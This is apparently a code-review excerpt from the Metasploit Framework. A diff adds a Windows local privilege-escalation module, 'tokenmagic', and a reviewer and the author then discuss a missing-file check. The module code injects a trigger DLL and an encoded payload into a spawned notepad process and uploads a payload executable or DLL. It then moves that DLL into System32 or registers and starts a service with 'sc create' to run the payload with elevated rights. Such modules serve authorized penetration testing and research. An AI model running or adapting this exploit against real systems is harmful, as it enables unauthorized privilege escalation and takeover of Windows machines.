modules/exploits/windows/local/tokenmagic.rb

```diff
@@ -0,0 +1,222 @@
+    exploit_mem, offset = inject_dll_data_into_process(process, dll)
+    print_good('Trigger injected.')
+    payload_mem = inject_into_process(process, payload.encoded)
+    print_good('Payload injected. Starting thread...')
+    process.thread.create(exploit_mem + offset, payload_mem)
+  end
+
+  def launch_dll_trigger
+    print_status('Trying to start notepad')
+    process = setup_process
+    inject_magic(process)
+    print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')
+  rescue Rex::Post::Meterpreter::RequestError => e
+    elog(e)
+    print_error(e.message)
+  end
+
+  def payload_arch
+    payload.arch.include?(ARCH_X64) ? ARCH_X64 : ARCH_X86
+  end
+
+  def exploit
+    win_dir = session.sys.config.getenv('windir')
+    cmd_path = "#{win_dir}\\system32\\cmd.exe"
+    if datastore['SERVICE_FILENAME']
+      service_filename = datastore['SERVICE_FILENAME']
+    else
+      service_filename = Rex::Text.rand_text_alpha(5..9)
+    end
+    service_filename = "#{service_filename}.exe" unless service_filename.end_with?('.exe')
+    if datastore['SERVICE_NAME']
+      service_name = datastore['SERVICE_NAME']
+    else
+      service_name = Rex::Text.rand_text_alpha(5..9)
+    end
+    if datastore['WRITABLE_DIR']
+      writable_dir = datastore['WRITABLE_DIR']
+    else
+      writable_dir = session.sys.config.getenv('TEMP')
+    end
+
+    if datastore['METHOD'] =~ /DLL/i
+      bin_path = "#{writable_dir}\\WindowsCoreDeviceInfo.dll"
+      payload = generate_payload_dll
+      vprint_status("Payload DLL is #{payload.length} bytes long")
+      client.core.use('powershell') unless client.ext.aliases.include?('powershell')
+      register_file_for_cleanup('C:\\Windows\\System32\\WindowsCoreDeviceInfo.dll') # Register this file for cleanup so that if we fail, then the file is cleaned up.
+      # Replace Value in Generic Script.
+      cmd_args = "/c move #{bin_path} C:\\Windows\\System32\\WindowsCoreDeviceInfo.dll"
+    else
+      bin_path = "#{writable_dir}\\#{service_filename}"
+      payload = generate_payload_exe_service({ servicename: service_name, arch: payload_arch })
+      vprint_status("Service Name = #{service_name}")
+      client.core.use('powershell') unless client.ext.aliases.include?('powershell')
+      # Replace Value in Generic Script. Note Windows 7 requires spaces after the equal signs in the below command.
+      cmd_args = "/c sc create #{service_name} binPath= #{bin_path} type= own start= demand && sc start #{service_name}"
+    end
+
+    # Check target
+    print_status('Checking Target')
+    validate_active_host
+    validate_payload
+
+    # Upload the payload
+    print_status("Uploading payload to #{bin_path}")
+    write_file(bin_path, payload)
+    register_file_for_cleanup(bin_path)
+
+    # Read in Generic Script
+    script = exploit_data('tokenmagic', 'tokenmagic.ps1')
+    fail_with(Failure::BadConfig, 'No exploit script found') if script.nil?
```

Comment:
Won't this still throw an error if the file doesn't exist on disk though? As far as I can tell `exploit_data` doesn't actually have any handlers to handle the case where the file doesn't exist so I'm confused if this is a good check or not.

Reply:
Good call. If the file doesn't exist the module fails with the following:
`[-] Exploit failed: Errno::ENOENT No such file or directory @ rb_sysopen - /Users/jheysel/rapid7/metasploit-framework/data/exploits/tokenmagic/tokenmagic.ps1`

I'll remove the check